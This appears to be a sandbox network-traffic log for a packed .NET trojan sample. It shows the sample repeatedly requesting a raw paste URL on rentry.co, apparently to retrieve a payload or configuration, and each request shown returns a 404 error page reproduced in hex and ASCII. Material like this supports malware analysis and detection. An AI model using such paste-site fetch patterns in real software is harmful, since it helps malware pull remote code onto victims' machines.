                                                                                        2024-10-18 10:43:49 UTC707INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:49 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <met
                                                                                        2024-10-18 10:43:49 UTC1369INData Raw: 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: .co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:49 UTC1015INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 66 39 32 64 31 37 32 63 63 33 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 79 4f 53 34 77
                                                                                        Data Ascii: /bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47edf92d172cc3',t:'MTcyOTI0ODIyOS4w
                                                                                        2024-10-18 10:43:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        57192.168.2.660712104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:50 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:50 UTC681INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:50 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k4Nk2BhGyFKNZZnhZ3hXmZnGUtg373lVb6ZBg3n1AirJDBe%2FCKDrMIp60i5sArI0M%2FWW3InYri5al3EmmSUPa3oaPo7Wx8KQQKsIxzOMyPCVkagV%2FMPTVPu%2Bsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47edffcbfd3468-DFW
                                                                                        2024-10-18 10:43:50 UTC688INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:50 UTC1369INData Raw: 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64
                                                                                        Data Ascii: ons/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and ed
                                                                                        2024-10-18 10:43:50 UTC1369INData Raw: 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69
                                                                                        Data Ascii: try.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container contai
                                                                                        2024-10-18 10:43:50 UTC1034INData Raw: 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 66 66 63 62 66 64 33 34 36 38 27 2c
                                                                                        Data Ascii: ipt src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47edffcbfd3468',
                                                                                        2024-10-18 10:43:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        58192.168.2.660713104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:51 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:43:51 UTC658INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:51 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t1ZRp5dkjWFENy9G9MHlyUj5iIVc2VQor2h%2FVZ6Uo62%2BnFpzZQLPONyIb%2BRQZExfnJJxfQw05SYvJxMS%2Fg2ICI9i9mEmjcLjuZ5eYqmQqvtD32QpK4ltnHHEGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee07fa986bde-DFW
                                                                                        2024-10-18 10:43:51 UTC711INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:51 UTC1369INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72
                                                                                        Data Ascii: eta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta pr
                                                                                        2024-10-18 10:43:51 UTC1369INData Raw: 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: ; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:51 UTC1011INData Raw: 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 30 37 66 61 39 38 36 62 64 65 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 7a 4d 53 34 77 4d 44 41 77
                                                                                        Data Ascii: tstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee07fa986bde',t:'MTcyOTI0ODIzMS4wMDAw
                                                                                        2024-10-18 10:43:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        59192.168.2.660714104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:52 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:43:53 UTC660INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:52 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZ9g5zHjXEep4sb1Gie%2FeCI%2BG%2B1uEdOVtRUwM4uUeiwySKoeT0KGmBVCw6McH%2FVo0AZE6638%2FrEjqibSALFP3gH18onll4OFngGAfeKoJD8ByMQKjPUnf6lUXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee0ee9b86b2a-DFW
                                                                                        2024-10-18 10:43:53 UTC709INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:53 UTC1369INData Raw: 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta
                                                                                        2024-10-18 10:43:53 UTC1369INData Raw: 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: o'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:53 UTC1013INData Raw: 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 30 65 65 39 62 38 36 62 32 61 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 7a 4d 69 34 77 4d 44
                                                                                        Data Ascii: ootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee0ee9b86b2a',t:'MTcyOTI0ODIzMi4wMD
                                                                                        2024-10-18 10:43:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        60192.168.2.660716104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:53 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:43:54 UTC664INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:54 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=skxR56Xdp%2BLkC8IQQRk%2BLlXfoSTdUXgfAKbBD1i5hnZ8iy5C3I6EpQGc68c7iM35bdT%2Fa7SHZc6Nhdxz%2Fd0%2BuPANVcHPr1WxXQFHKITvIs0%2BM9%2FtbkUXuFXrCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee15a8f26bec-DFW
